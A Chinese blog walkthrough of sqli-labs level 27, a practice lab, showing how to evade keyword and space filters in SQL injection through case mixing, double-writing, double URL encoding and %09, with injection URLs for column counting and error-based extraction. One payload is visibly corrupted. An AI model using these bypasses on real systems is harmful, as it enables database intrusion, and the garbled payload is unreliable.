当前位置: 首页 > news >正文

sqli-labs第二十七关——Trick with selectunion

进去之后,可以看见提示这一关新屏蔽了union 和 select,查看源码

确定:/*,--+,#,spaces,union,select,union,select的大小写均被屏蔽了

 总结一下:

sql注入绕过技术

  • 大小写绕过:任意字母大小写,如and→ANd / AND / anD
  • 双写绕过:or→oror / oorr
  • url编码(两次):

                原理:.WAF(web应用防火墙)只解码一次,但后端服务器解码两次

                例如:空格的url解码是%20,我们要对%20再次编码

                                %→%25,数字保持不变,也就是最终变成%2520(不用双重全编码(%25%32%30),这个已经足够高效并且能绕过多数WAF了)

这一关我们用大小写绕过,空格过滤用%09绕过,and与or用&&与||绕过,union改成UNIon,select改成SELEct,结尾注释符号仍然用 ||'

一:判断注入类型

输入 ?id=1' 和 ?id=1') 的时候报错

尝试闭合 ,单引号闭合成功

?id=1'||'

二:开始注入

1.爆列数

?id=1'%09oRdeR%09b,4y%091,2,3,4||'

四列

2.爆回显位 

?id=-1'%09UNIon%09SELEct%091,database(),3%09||'

无回显,使用报错注入

3.爆数据库名字

?id=1'%09and%09extractvalue(1,concat(0x7e,database()))||'

 ❀❀❀ 完结撒花!!!❀❀❀

 


文章转载自:

http://5PfioIJN.zkbxx.cn
http://mWlAvg5u.zkbxx.cn
http://209EHvUm.zkbxx.cn
http://o0Ri0ugZ.zkbxx.cn
http://o0QLz4o1.zkbxx.cn
http://KMhgBZyH.zkbxx.cn
http://LsWgLw2t.zkbxx.cn
http://YRVBZTGP.zkbxx.cn
http://l6i8gzOY.zkbxx.cn
http://1S6xcXI1.zkbxx.cn
http://nVQTOv4i.zkbxx.cn
http://RSY2V8tN.zkbxx.cn
http://Qb7grhTG.zkbxx.cn
http://uaunPqho.zkbxx.cn
http://eAVhh0Xu.zkbxx.cn
http://yRp4azbj.zkbxx.cn
http://J3BpLUh3.zkbxx.cn
http://eOtGzTao.zkbxx.cn
http://kkxUM2Fd.zkbxx.cn
http://3hJxClD0.zkbxx.cn
http://SbWmvFKm.zkbxx.cn
http://YTVXj5K9.zkbxx.cn
http://xhHuIuiy.zkbxx.cn
http://3CBX7kvX.zkbxx.cn
http://d6Q52t5n.zkbxx.cn
http://kZ6tnZdN.zkbxx.cn
http://rJRStcjK.zkbxx.cn
http://miNxYH1E.zkbxx.cn
http://58UIGcxI.zkbxx.cn
http://olIHhynj.zkbxx.cn
http://www.dtcms.com/a/214690.html

相关文章:

  • Queue 与 Deque 有什么区别?
  • 人工智能第一币AISPF,首发BitMart交易所
  • C++笔记-哈希表
  • etcd之etcd curl命令(七)
  • 《反事实棱镜:折射因果表征学习的深层逻辑》
  • AI时代新词-私有数据与AI结合的技术:隐私保护与数据利用的平衡
  • 多头注意力 vs 单头注意力:计算量与参数量区别
  • 游戏行业DDoS防护:基于IP信誉库的实时拦截方案
  • 【数据集】基于ubESTARFM法的100m 地温LST数据集(澳大利亚)
  • 批量转存夸克网盘内容并分享实操教程
  • 002大模型-提示词工程,少样本提示,角色扮演,思维链
  • Axure元件动作七:移动、旋转、启用/禁用效果、置于顶层/底层详解
  • 2025-05-26 什么是“AI 全栈”
  • 离线安装Microsoft 照片【笔记】
  • 通配符滥用详解:Linux命令行的潜在风险
  • 【逆向 | CTF】攻防世界 Reversing-x64Elf-100 二次解密
  • 第1章第1节:安全运维基础思维与体系建设-安全运维的定义与核心目标
  • 题目 3331: 蓝桥杯2025年第十六届省赛真题-LQ 图形
  • 遥感四十号 02 组卫星发射成功遥感科普:电磁环境探测
  • esp8266 点灯科技远程控制继电器
  • C/C++---类型转换运算符
  • 嵌入式开发STM32 -- 江协科技笔记
  • Engineering a direct k-way Hypergraph Partitioning Algorithm【2017 ALENEX】
  • springboot启动流程
  • 实验四:用户管理和sudo提权
  • 【Redis】3-Redis应用
  • 大语言模型(LLM)入门项目推荐
  • 【springMVC】springMVC学习系列一:springMVC的组件
  • 经典分类模型
  • C#编解码:Base64扩展类的实现与应用